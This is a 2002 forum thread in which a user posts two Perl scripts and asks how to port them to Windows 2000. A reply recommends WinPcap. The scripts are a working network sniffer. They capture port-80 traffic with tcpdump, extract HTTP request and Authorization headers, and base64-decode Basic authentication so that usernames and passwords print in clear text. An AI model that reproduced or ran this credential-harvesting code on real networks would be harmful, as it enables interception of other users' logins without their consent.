Bode
Novice

Dec 4, 2002, 8:24 AM

Post #1 of 2 (3562 views)
packet sniffer

Below are two files which act as a packet sniffer. I haven't been able to try them out as they are for UNIX and I don't have a root account on a UNIX.

Is there a way I can modify them for use on Windows 2000, and in particular is there an equivalent tcpdump for Windows 2000?

Cheers for any help or suggestions.



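#!/usr/bin/perl
# Reads lines of the form "addr -> addr<TAB>text" (the format the second
# script prints), decodes HTTP Basic credentials and resolves the addresses.

use Socket;
use MIME::Base64;


$|=1;    # unbuffered output
while (<>) {
    next unless ($host,$client,$msg) = /(\S+) -> (\S+)\s+(.*)\s+/;
    # Basic auth is only base64-encoded, so user:password is recovered as-is
    $msg=~s/(Authorization:\s+Basic\s+)(\S+)/$1 . decode_base64($2)/e;
    print lookup($host)," -> ",lookup($client),"\t$msg\n";
}


# Reverse-resolve an IPv4 address; fall back to the address itself
sub lookup {
    my $addr = shift;
    my $lookup = (gethostbyaddr(inet_aton($addr),AF_INET))[0];
    return $lookup || $addr;
}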


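#!/usr/bin/perl
# Runs tcpdump on traffic to port 80 and prints the HTTP request and
# authentication header lines found in each packet.

$LIMIT = shift || 5000;    # number of packets to examine

$|=1;
open (STDIN,"/usr/sbin/tcpdump -lnx -s 1024 dst port 80 |")
    or die "cannot run tcpdump: $!";
while (<>) {
    if (/^\S/) {    # unindented line: header of the next packet
        last unless $LIMIT--;
        # report what was collected for the previous packet
        while ($packet=~/(GET|POST|WWW-Authenticate|Authorization).+/g) {
            print "$client -> $host\t$&\n";
        }
        undef $client; undef $host; undef $packet;
        # only track packets that carry data (P flag, length > 0)
        ($client,$host) = /(\d+\.\d+\.\d+\.\d+).+ > (\d+\.\d+\.\d+\.\d+)/
            if /P \d+:\d+\((\d+)\)/ && $1 > 0;
        next;    # the header line itself is not part of the hex dump
    }
    next unless $client && $host;
    s/\s+//;                               # drop leading indentation
    s/([0-9a-f]{2})\s?/chr(hex($1))/eg;    # hex dump -> raw bytes
    tr/\x1F-\x7E\r\n//cd;                  # strip bytes outside \x1F-\x7E, CR, LF
    $packet .= $_;
}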





Sgt_B
Novice

Jan 2, 2003, 2:15 PM

Post #2 of 2 (3540 views)
Re: [Bode] packet sniffer

WinPcap is the Windows alternative. Here's a link to a download site:

http://www.datanerds.net/~mike/netgroup-serv.polito.it/winpcap/install/default.htm

From what I hear, it's not as good as tcpdump, but that's just something I heard....
